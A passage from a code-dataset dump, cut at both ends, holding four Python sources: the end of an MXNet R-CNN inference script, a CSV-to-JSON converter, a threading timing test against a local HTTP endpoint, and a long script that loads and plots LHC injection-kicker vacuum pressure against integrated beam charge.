result_dic = dict()\n for img in lst_img:\n print('processing: ' + img.strip())\n tmp = demo_net(predictor, args.imageprefix +\n img.strip(), args.vis, save_dir=args.savedir, save_name=img.strip(), threshold=args.threshold)\n # if tmp:\n result_dic[img.strip()] = tmp\n json.dump(result_dic, open(args.save_json, 'w'),indent=2)\n print('result json file saved to: {}'.format(args.save_json))\n\ndef test(args):\n global CLASSES, DATA_SHAPES, SHORT_SIDE, LONG_SIDE\n # args = parse_args()\n ctx = mx.gpu(args.gpu)\n CLASSES = ['__background__']\n SHORT_SIDE, LONG_SIDE = args.shortside, args.longside\n DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\n with open(args.labellist, 'r') as label_list:\n for label in label_list:\n CLASSES.append(label.strip())\n # print(CLASSES)\n symbol = eval('rcnn.symbol.get_' + args.network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)\n # symbol = rcnn.symbol.get_resnet_test(\n # num_classes=len(CLASSES), num_anchors=config.NUM_ANCHORS)\n predictor = get_net(symbol, args.prefix, args.epoch, ctx)\n demo_net(predictor, args.image, args.vis, save_dir=args.savedir, save_name='objdet_'+os.path.basename(args.image), threshold=args.threshold)\n\nif __name__ == '__main__':\n args = parse_args()\n if args.test:\n print('testing single image...')\n test(args)\n else:\n print('start testing...')\n main(args)\n","sub_path":"mxnet-cubicle/obj-det/rcnn/infer_dummy.py","file_name":"infer_dummy.py","file_ext":"py","file_size_in_byte":9567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"536330804","text":"# 读csv\nimport csv\nimport json\n\ndata = {}\nfilename = 'ch02-data.csv'\nwith open(filename) as f:\n reader = csv.reader(f)\n for row in reader:\n data[row[0]] = row[1]\n\n# 写json\nfilename2 = 'fileFor05.json'\nwith open(filename2, 'w') as f_obj:\n json.dump(data, f_obj)\n\n","sub_path":"chapter02_data/05_ExportToJson.py","file_name":"05_ExportToJson.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"133544892","text":"import threading\nfrom datetime import datetime\n\nimport requests\n\n\ndef sample_func():\n response = requests.get('http://192.168.10.6:8000/zzz/sleep/5')\n print(response.text)\n\n\nCOUNT = 5\n\nstart = datetime.now()\nfor _ in range(COUNT):\n sample_func()\nfinish = datetime.now()\nprint('Single : {}'.format(finish - start))\ndel start, finish\n\nthread_list = []\nstart = datetime.now()\nfor i in range(COUNT):\n thread_list.append(threading.Thread(name = '{} 쓰레드'.format(i + 1), target = sample_func))\n\nfor th in thread_list:\n print(th.name)\n th.start()\n\nfor th in thread_list:\n th.join()\nfinish = datetime.now()\nprint('Multi-Thread : {}'.format(finish - start))\n","sub_path":"sample/thread/test_thread_2.py","file_name":"test_thread_2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"271040226","text":"import matplotlib.pyplot as plt\nimport pytimber\nfrom pytimber import pagestore\nimport calendar, time\nimport math\n#%matplotlib notebook\n#####COMBINING SCRIPTS FOR MKI2 AND MKI8#####\n\n\n# DEFINING FUNCTIONS\n\n# sorting by the length of the array\ndef sort(x):\n return sorted(x, key=lambda time: time[1], reverse=True)\n\n\n# choosing second magnet(in array length) for alignment\ndef get_magnet(x):\n return x[1]\n\n\n# calculating elapsed time\nelapb1 = []\n\nelapb2 = []\n\ndef elapsed(ts, ts0):\n return (ts - ts0) / 3600\n\n# new script for beam elapsed time\nbeam_elapb1 = []\nbeam_elap_running_totalb1=0\n\nbeam_elapb2 = []\nbeam_elap_running_totalb2=0\n\nbeam_intb1 = []\nbeam_chargeb1=0\nbeam_intb2 = []\nbeam_chargeb2=0\n\ndef beam_elapsedb1(tsOne, tsZero, bi, counti):\n global beam_elap_running_totalb1\n #print(counti)\n if bi >= 10 ** 12 and counti>0:\n beam_elap_running_totalb1=beam_elap_running_totalb1+(tsOne - tsZero) / 3600\n #print(beam_elap_running_total, tsOne, tsZero, counti)\n return beam_elap_running_totalb1\n \n else: \n return beam_elap_running_totalb1+10 ** (-12)\n \ndef beam_elapsedb2(tsOne, tsZero, bi, counti):\n global beam_elap_running_totalb2\n #print(counti)\n if bi >= 10 ** 12 and counti>0:\n beam_elap_running_totalb2=beam_elap_running_totalb2+(tsOne - tsZero) / 3600\n #print(beam_elap_running_total, tsOne, tsZero, counti)\n return beam_elap_running_totalb2\n \n else: \n return beam_elap_running_totalb2+10 ** (-12) \n\ndef beam_integralb1(tsOne, TsZero, Ione, Izero, counti):\n global beam_chargeb1\n if Ione >= 10 ** 12 and counti>0:\n if math.isnan(Izero): \n Izero=0\n beam_chargeb1 = beam_chargeb1+((tsOne-TsZero)*(Ione+Izero)*1.602176*10**(-19))/2\n #print(tsOne, (tsOne-TsZero),'Izero=',Izero,Ione,(Ione+Izero)*1.602176*10**(-19), beam_chargeb1, counti)\n return beam_chargeb1\n \n else:\n return beam_chargeb1\n \ndef beam_integralb2(tsOne, TsZero, Ione, Izero, counti):\n global beam_chargeb2\n if Ione >= 10 ** 12 and counti>0:\n if math.isnan(Izero): \n Izero=0\n beam_chargeb2 = beam_chargeb2+((tsOne-TsZero)*(Ione+Izero)*1.602176*10**(-19))/2\n #print((tsOne-TsZero),(Ione+Izero)*1.602176*10**(-19), beam_chargeb2, counti)\n return beam_chargeb2\n \n else:\n return beam_chargeb2\n# calculating normalized pressure MKI2\nnormAb1 = []\nnormBb1 = []\nnormCb1 = []\nnormDb1 = []\nnormDCb1 = []\nnormAQ4b1 = []\nnormQ5Db1 = []\nnormBAb1 = []\nnormCBb1 = []\n\n# calculating normalized pressure MKI8\nnormAb2 = []\nnormBb2 = []\nnormCb2 = []\nnormDb2 = []\nnormDCb2 = []\nnormAQ4b2 = []\nnormQ5Db2 = []\nnormBAb2 = []\nnormCBb2 = []\n\n\n\ndef normalization(p, bi):\n if bi >= 10 ** 12:\n return p / bi\n else:\n return 10 ** -99\n\n# RUNNING THE COD\nxupperlim = 100 #Charge Coloumbs\n# xupperlim = 1550 for the whole of 2017 Run\n#defining the time window\n#MKI2 time\n# 29/4/2017: LHC circulating protons for 1st time in 2017 https://home.cern/news/news/accelerators/lhc-has-restarted-its-2017-run\n# 30/3/2018: LHC circulating protons for 1st time in 2018 https://home.cern/news/news/accelerators/beams-are-back-lhc\n\nt1b1 = \"2012-07-01 00:00:00\"\nt2b1 = \"2012-07-01 23:59:59\"\nt1b2 = \"2012-07-01 00:00:00\"\nt2b2 = \"2012-07-01 23:59:59\"\n\n# t1b1 = \"2015-06-01 00:00:00\" # was 2017-04-29\n# t2b1 = \"2015-07-30 23:59:59\"\n\n# t1b2 = \"2015-06-01 00:00:00\" # was 2018-03-30\n# t2b2 = \"2015-07-30 23:59:59\" # was 2018-10-01\nPlotVsTime = \"N\" # Y or N\nPlotBothMagD_Interconnects = \"N\"\nPlotBothInterconnects = \"N\"\n\n#===============================================================================\n# #===============================================================================\n# t1b1 = \"2018-04-20 00:00:00\"\n# t2b1 = \"2018-05-29 23:59:59\"\n# # \n# t1b2 = \"2018-04-20 00:00:00\"\n# t2b2 = \"2018-05-29 23:59:59\"\n# #===============================================================================\n#===============================================================================\n\nt0_beam2_elap_running_total_start_counter = \"2012-07-01 00:00:00\"\n#t0_beam2_elap_running_total_start_counter = \"2018-04-16 00:00:00\"\n#t1b2 = \"2018-04-20 00:00:00\"\n#t1b2 = \"2018-05-11 00:00:00\"\n#t2b2 = \"2018-05-29 23:59:59\"\n\n# subtract 0s to keep in UTC time.\n# subtract 2 * 3600s to convert from Local time to UTC time\nt1sb1= calendar.timegm(time.strptime(t1b1,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nt2sb1= calendar.timegm(time.strptime(t2b1,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nbeam1_elap_running_total=0\nt0_beam1_elap_running_total_start_counter = \"2012-07-01 00:00:00\"\n\nt0b1=beam1_elap_running_total\n\ntitletextb1=\"Start time (MKI2) = \",t1b1,\" End time (MKI2) = \",t2b1,\" Start beam1 elapsed time counter = \",int(t0b1*10)/10,\"hrs, since:\",t0_beam1_elap_running_total_start_counter\nprint(titletextb1)\n\n#MKI8 time\n\nt1sb2 = calendar.timegm(time.strptime(t1b2,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nt2sb2 = calendar.timegm(time.strptime(t2b2,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nbeam2_elap_running_total=0\n\n\nt0b2=beam2_elap_running_total\n\ntitletextb2=\"Start time (MKI8) = \",t1b2,\" End time (MKI8) = \",t2b2,\" Start beam1 elapsed time counter = \",int(t0b2*10)/10,\"hrs, since:\",t0_beam2_elap_running_total_start_counter\nprint(titletextb2)\n\n# now = time.time()\n\n# opening the connection to the database\nstart_time = time.time()\n#pageStore = pagestore.PageStore('lhcPressure.db', '/eos/project/l/lhc-injection-kickers/public/vacuum_data/LHC_PRESSURE/02')\npageStore = pagestore.PageStore('lhcPressure.db', './data/LHCpressure_data/')\n\nparameters0b1=[\"MKI.A5L2.B1:PRESSURE\", \"MKI.B5L2.B1:PRESSURE\", \"MKI.C5L2.B1:PRESSURE\", \"MKI.D5L2.B1:PRESSURE\"]\nparameters0b2= [\"MKI.A5R8.B2:PRESSURE\", \"MKI.B5R8.B2:PRESSURE\", \"MKI.C5R8.B2:PRESSURE\", \"MKI.D5R8.B2:PRESSURE\"]\n\n# extracting aligned data MKI2\nparametersb1 = parameters0b1 + [\"VGPB.137.5L2.B.PR\", \"VGPB.14.5L2.B.PR\", \"VGPB.176.5L2.B.PR\", \"VGPB.59.5L2.B.PR\",\n \"VGPB.98.5L2.B.PR\", \"LHC.BCTFR.A6R4.B1:BEAM_INTENSITY\", \"MKI.A5L2.B1:PRESSURE_INT\", \n \"MKI.B5L2.B1:PRESSURE_INT\", \"MKI.C5L2.B1:PRESSURE_INT\", \"MKI.D5L2.B1:PRESSURE_INT\"]\n# extracting aligned data MKI8\nparametersb2 = parameters0b2 + [\"VGPB.138.5R8.R.PR\", \"VGPB.14.5R8.R.PR\", \"VGPB.176.5R8.R.PR\", \"VGPB.59.5R8.R.PR\",\n \"VGPB.98.5R8.R.PR\", \"LHC.BCTFR.A6R4.B2:BEAM_INTENSITY\", \"MKI.A5R8.B2:PRESSURE_INT\", \n \"MKI.B5R8.B2:PRESSURE_INT\", \"MKI.C5R8.B2:PRESSURE_INT\", \"MKI.D5R8.B2:PRESSURE_INT\"]\n#parameters = parameters0 + (\"VGPB.138.5R8.R.PR\", \"VGPB.176.5R8.R.PR\", \n# \"LHC.BCTFR.A6R4.B2:BEAM_INTENSITY\")\n\ndatab1 = pageStore.get(parametersb1, t1sb1, t2sb1)\ndatab2 = pageStore.get(parametersb2, t1sb2 ,t2sb2 )\n\n\n\n# the dictionary returned contains one list of timestamps and one entry per variable with a list of values.\n# all parameters are aligned with the first one\n\n# separating time data from pressure/intensity data MKI2\naligned_timeb1 = datab1['MKI.A5L2.B1:PRESSURE'][0]\npressureAb1 = datab1['MKI.A5L2.B1:PRESSURE'][1]\npressureBb1 = datab1['MKI.B5L2.B1:PRESSURE'][1]\npressureCb1 = datab1['MKI.C5L2.B1:PRESSURE'][1]\n#pressureCb1 = datab1['VGPB.118.5L2.C.PR'][1] \n# Note: MKI.C5L2.B1:PRESSURE valid from 20/6/2018 @ 13:40hrs\n# Note: VGPB.118.5L2.C.PR is much lower time resolution than MKI.C5L2.B1:PRESSURE\npressureDb1 = datab1['MKI.D5L2.B1:PRESSURE'][1]\npressureDCb1 = datab1['VGPB.137.5L2.B.PR'][1]\npressureAQ4b1 = datab1['VGPB.14.5L2.B.PR'][1]\npressureQ5Db1 = datab1['VGPB.176.5L2.B.PR'][1]\npressureBAb1 = datab1['VGPB.59.5L2.B.PR'][1]\npressureCBb1 = datab1['VGPB.98.5L2.B.PR'][1]\nintensityb1 = datab1['LHC.BCTFR.A6R4.B1:BEAM_INTENSITY'][1]\npressureA_intb1 = datab1['MKI.A5L2.B1:PRESSURE_INT'][1]\npressureB_intb1 = datab1['MKI.B5L2.B1:PRESSURE_INT'][1]\npressureC_intb1 = datab1['MKI.C5L2.B1:PRESSURE_INT'][1]\npressureD_intb1 = datab1['MKI.D5L2.B1:PRESSURE_INT'][1]\n\n# separating time data from pressure/intensity data MKI8\naligned_timeb2 = datab2['MKI.A5R8.B2:PRESSURE'][0]\npressureAb2 = datab2['MKI.A5R8.B2:PRESSURE'][1]\npressureBb2 = datab2['MKI.B5R8.B2:PRESSURE'][1]\npressureCb2 = datab2['MKI.C5R8.B2:PRESSURE'][1]\npressureDb2 = datab2['MKI.D5R8.B2:PRESSURE'][1]\npressureDCb2 = datab2['VGPB.138.5R8.R.PR'][1]\npressureAQ4b2 = datab2['VGPB.14.5R8.R.PR'][1]\npressureQ5Db2 = datab2['VGPB.176.5R8.R.PR'][1]\npressureBAb2 = datab2['VGPB.59.5R8.R.PR'][1]\npressureCBb2 = datab2['VGPB.98.5R8.R.PR'][1]\nintensityb2 = datab2['LHC.BCTFR.A6R4.B2:BEAM_INTENSITY'][1]\npressureA_intb2 = datab2['MKI.A5R8.B2:PRESSURE_INT'][1]\npressureB_intb2 = datab2['MKI.B5R8.B2:PRESSURE_INT'][1]\npressureC_intb2 = datab2['MKI.C5R8.B2:PRESSURE_INT'][1]\npressureD_intb2 = datab2['MKI.D5R8.B2:PRESSURE_INT'][1]\n\nprint(\"*** Number of entries for aligned_time (MKI2) = \", len(aligned_timeb1))\nprint(\"*** Number of entries for aligned_time (MKI8) = \", len(aligned_timeb2))\n\n\n\n\n\n\n# calculating elapsed time, normalized pressure and beam elapsed time and pressure/normalized pressure\nstart_time = time.time()\n#MKI2\nfor i in range(len(aligned_timeb1)):\n elapb1.append(elapsed(aligned_timeb1[i], aligned_timeb1[0]))\n beam_elapb1.append(beam_elapsedb1(aligned_timeb1[i], aligned_timeb1[i-1], intensityb1[i], i)) \n normAb1.append(normalization(pressureAb1[i], intensityb1[i]))\n normBb1.append(normalization(pressureBb1[i], intensityb1[i]))\n #normCb1.append(normalization(pressureCb1[i], intensityb1[i]))\n normDb1.append(normalization(pressureDb1[i], intensityb1[i]))\n normDCb1.append(normalization(pressureDCb1[i], intensityb1[i]))\n normAQ4b1.append(normalization(pressureAQ4b1[i], intensityb1[i]))\n normQ5Db1.append(normalization(pressureQ5Db1[i], intensityb1[i]))\n normBAb1.append(normalization(pressureBAb1[i], intensityb1[i]))\n normCBb1.append(normalization(pressureCBb1[i], intensityb1[i]))\n ## problem on following line??\n beam_intb1.append(beam_integralb1(aligned_timeb1[i], aligned_timeb1[i-1], intensityb1[i], intensityb1[i-1],i))\ncalculation_time = time.time()-start_time\nprint(\"Execution time for B1: calculating normalized data, elapsed time and integral: %0.3f seconds.\" % calculation_time)\nstart_time = time.time()\n#MKI8\nfor i in range(len(aligned_timeb2)):\n elapb2.append(elapsed(aligned_timeb2[i], aligned_timeb2[0]))\n beam_elapb2.append(beam_elapsedb2(aligned_timeb2[i], aligned_timeb2[i-1], intensityb2[i], i)) \n normAb2.append(normalization(pressureAb2[i], intensityb2[i]))\n normBb2.append(normalization(pressureBb2[i], intensityb2[i]))\n normCb2.append(normalization(pressureCb2[i], intensityb2[i]))\n normDb2.append(normalization(pressureDb2[i], intensityb2[i]))\n normDCb2.append(normalization(pressureDCb2[i], intensityb2[i]))\n normAQ4b2.append(normalization(pressureAQ4b2[i], intensityb2[i]))\n normQ5Db2.append(normalization(pressureQ5Db2[i], intensityb2[i]))\n normBAb2.append(normalization(pressureBAb2[i], intensityb2[i]))\n normCBb2.append(normalization(pressureCBb2[i], intensityb2[i]))\n beam_intb2.append(beam_integralb2(aligned_timeb2[i], aligned_timeb2[i-1], intensityb2[i], intensityb2[i-1],i))\n #print(aligned_timeb2[i], aligned_timeb2[i-1], intensityb2[i], intensityb2[i-1],i)\ncalculation_time = time.time()-start_time\nprint(\"Execution time for B2: calculating normalized data and elapsed time: %0.3f seconds.\" % calculation_time)\n\ntitletextb1=' MKI2: Start time = ' + str(t1b1) + ', End time = ' + str(t2b1) + ', Start/End beam1 elapsed time = ' + str(int(t0b1*10)/10) + '/' + str(int(10*beam_elap_running_totalb1)/10) + 'hrs (' + str(int(beam_chargeb1*10)/10) + 'C), since ' + t0_beam1_elap_running_total_start_counter\nprint(titletextb1)\nprint('MKI8: Start time = ' + str(t1b2) + ', End time = ' + str(t2b2) + ', Start/End beam2 elapsed time = ' + str(int(t0b2*10)/10))\n##print(str(int(10*beam_elap_running_totalb2)/10) + 'hrs (')\n##print(beam_chargeb2)\n##print(str(int(beam_chargeb2*10)/10) + 'C), since ')\n##print(t0_beam2_elap_running_total_start_counter)\ntitletextb2='MKI8: Start time = ' + str(t1b2) + ', End time = ' + str(t2b2) + ', Start/End beam2 elapsed time = ' + str(int(t0b2*10)/10) + '/' + str(int(10*beam_elap_running_totalb2)/10) + 'hrs (' + str(int(beam_chargeb2*10)/10) + 'C), since ' + t0_beam2_elap_running_total_start_counter\nprint(titletextb2)\n\n\n\nprint(\"Plot: Beam1 Integral & Beam Intensity vs. Aligned Time\")\nfig, ax1 = plt.subplots(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\n#ax1.plot(aligned_timeb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\nax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\nax1.set_ylabel(r'Beam Integral (C)')\nax1.set_ylim(0, )\n#ax1.plt.xticks(fontsize=12.5)#ax1.plt.yticks(fontsize=13)\nax1.xaxis.label.set_size(13.5)\nax1.yaxis.label.set_size(13.5)\n#ax1.set_ylim(10 ** -25, 2*10 ** -20)\nax1.set_xlabel(r'Date & (UTC) time')\npytimber.set_xaxis_date(bins=7)\nplt.legend(loc=2, prop={'size':11.5})\nax2 = ax1.twinx()\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\n#ax2.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B2')\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.plot(aligned_timeb1, normQ5Db1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.set_ylabel(r'Normalized pressure (mbar/p)')\n#ax2.yaxis.label.set_size(13.5)\nax2.tick_params(axis='y', colors='green')\nax2.yaxis.label.set_color('green')\nax2.semilogy()\nax2.set_ylim(10 ** -25, 1*10 ** -21)\n#ax2.set_ylim(0, 3.5*10 ** 14)\nplt.legend(prop={'size':11.5})\nplt.show()\n\nprint(\"Plot: Beam2 Integral & Beam Intensity vs. Aligned Time\")\nfig, ax1 = plt.subplots(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\nax1.plot(aligned_timeb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\n#ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\nax1.set_ylabel(r'Beam Integral (C)')\nax1.set_ylim(0, )\n#ax1.plt.xticks(fontsize=12.5)#ax1.plt.yticks(fontsize=13)\nax1.xaxis.label.set_size(13.5)\nax1.yaxis.label.set_size(13.5)\n#ax1.set_ylim(10 ** -25, 2*10 ** -20)\nax1.set_xlabel(r'Date & (UTC) time')\npytimber.set_xaxis_date(bins=7)\nplt.legend(loc=2, prop={'size':11.5})\nax2 = ax1.twinx()\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B2')\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.set_ylabel(r'Beam intensity (p)')\n#ax2.yaxis.label.set_size(13.5)\nax2.tick_params(axis='y', colors='green')\nax2.yaxis.label.set_color('green')\nax2.set_ylim(0, 3.5*10 ** 14)\nplt.legend(prop={'size':11.5})\nplt.show()\n\nif PlotVsTime == \"N\":\n print(\"Plot: Beam Integral & Beam Intensity vs. Elapsed Beam Time\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n ax1.plot(beam_elapb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\n ax1.plot(beam_elapb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\n ax1.set_ylabel(r'Beam Integral (C)')\n ax1.set_ylim(0, )\n #ax1.plt.xticks(fontsize=12.5)\n #ax1.plt.yticks(fontsize=13)\n ax1.xaxis.label.set_size(13.5)\n ax1.yaxis.label.set_size(13.5)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Beam Elapsed Time (>10**12 p)')\n #pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n ax2 = ax1.twinx()\n ax2.plot(beam_elapb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\n ax2.plot(beam_elapb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B2')\n ax2.set_ylabel(r'Beam intensity (p)')\n #ax2.yaxis.label.set_size(13.5)\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend(prop={'size':11.5})\n plt.show()\n\nif PlotVsTime == \"Y\":\n print(\"Plot: Beam Integral & Beam Intensity vs. Aligned Time\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\n ax1.plot(aligned_timeb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\n ax1.set_ylabel(r'Beam Integral (C)')\n ax1.set_ylim(0, )\n #ax1.plt.xticks(fontsize=12.5)\n #ax1.plt.yticks(fontsize=13)\n ax1.xaxis.label.set_size(13.5)\n ax1.yaxis.label.set_size(13.5)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n ax2 = ax1.twinx()\n ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\n ax2.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B1')\n ax2.set_ylabel(r'Beam intensity (p)')\n #ax2.yaxis.label.set_size(13.5)\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend(prop={'size':11.5})\n plt.show()\n\nprint(\"Plot: Magnet Norm Pressure vs. Beam Integral\")\nplt.figure(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#plt.suptitle(titletextb2, fontsize=11, y=0.94)\nplt.plot(beam_intb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\nplt.plot(beam_intb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\nax=plt.gca()\nplt.xticks(fontsize=12.5)\nplt.yticks(fontsize=13)\nax.yaxis.grid(linestyle='--') # plot horizontal lines\nax.xaxis.label.set_size(13.5)\nax.yaxis.label.set_size(13.5)\nax.set_xlim(0, xupperlim)\nax.set_ylabel(r'Normalized pressure (mbar/p)')\nax.semilogy()\nax.set_ylim(10 ** -25, 1*10 ** -21)\nax.set_xlabel(r'Beam Integral (C)')\nplt.legend(prop={'size':11.5})\nplt.show()\n\nif PlotVsTime == \"Y\":\n # Beam intensity\n print(\"Plot: Beam Intensity vs. Time\")\n plt.figure(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n #plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n plt.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=2, label='Beam intensity B1')\n plt.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=2, label='Beam intensity B2')\n #plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n ax=plt.gca()\n plt.xticks(fontsize=12.5)\n plt.yticks(fontsize=13)\n ax.xaxis.label.set_size(13.5)\n ax.yaxis.label.set_size(13.5)\n #ax.set_xlim(0, xupperlim)\n ax.set_ylabel(r'Beam intensity (p)')\n #ax.semilogy()\n ax.set_ylim(0, 3.5*10 ** 14)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(prop={'size':11.5})\n plt.show()\n\n\nif PlotBothMagD_Interconnects == \"Y\":\n print(\"Plot: MKI2D+Interconnects & MKI8D+Interconnects\")\n plt.figure(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n plt.plot(beam_intb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n plt.plot(beam_intb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\n plt.plot(beam_intb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n plt.plot(beam_intb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n plt.plot(beam_intb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\n plt.plot(beam_intb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect Q5-MKI8D')\n ax=plt.gca()\n plt.xticks(fontsize=12.5)\n plt.yticks(fontsize=13)\n ax.xaxis.label.set_size(13.5)\n ax.yaxis.label.set_size(13.5)\n ax.set_xlim(0, xupperlim)\n ax.set_ylabel(r'Normalized pressure (mbar/p)')\n ax.semilogy()\n ax.set_ylim(10 ** -25, 1*10 ** -20)\n ax.set_xlabel(r'Beam Integral (C)')\n plt.legend(prop={'size':11.5})\n plt.show()\n\n\nif PlotBothInterconnects == \"Y\":\n print(\"Plot 4\")\n plt.figure(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n #plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n plt.plot(beam_intb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\n plt.plot(beam_intb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n #plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n plt.plot(beam_intb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\n plt.plot(beam_intb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect Q5-MKI8D')\n ax=plt.gca()\n plt.xticks(fontsize=12.5)\n plt.yticks(fontsize=13)\n ax.xaxis.label.set_size(13.5)\n ax.yaxis.label.set_size(13.5)\n ax.set_xlim(0, xupperlim)\n ax.set_ylabel(r'Normalized pressure (mbar/p)')\n ax.semilogy()\n ax.set_ylim(5 * 10 ** -25, 2*10 ** -21)\n ax.set_xlabel(r'Beam Integral (C)')\n plt.legend(prop={'size':11.5})\n plt.show()\n\nprint(\"Plot 4a: Interconnect C-D norm pressure versus Beam Integral\")\nplt.figure(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\nplt.plot(beam_intb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\n#plt.plot(beam_elapb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n#plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\nplt.plot(beam_intb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\n#plt.plot(beam_elapb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect MKI8D-Q5')\nax=plt.gca()\nplt.xticks(fontsize=12.5)\nplt.yticks(fontsize=13)\nax.yaxis.grid(linestyle='--') # plot horizontal lines\nax.xaxis.label.set_size(13.5)\nax.yaxis.label.set_size(13.5)\nax.set_xlim(0, xupperlim)\nax.set_ylabel(r'Normalized pressure (mbar/p)')\nax.semilogy()\nax.set_ylim(5 * 10 ** -25, 2*10 ** -21)\nax.set_xlabel(r'Beam Integral (C)')\nplt.legend(prop={'size':11.5})\nplt.show()\n\nprint(\"Plot 4b: Interconnect Q5-D norm pressure versus Beam Integral\")\nplt.figure(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, 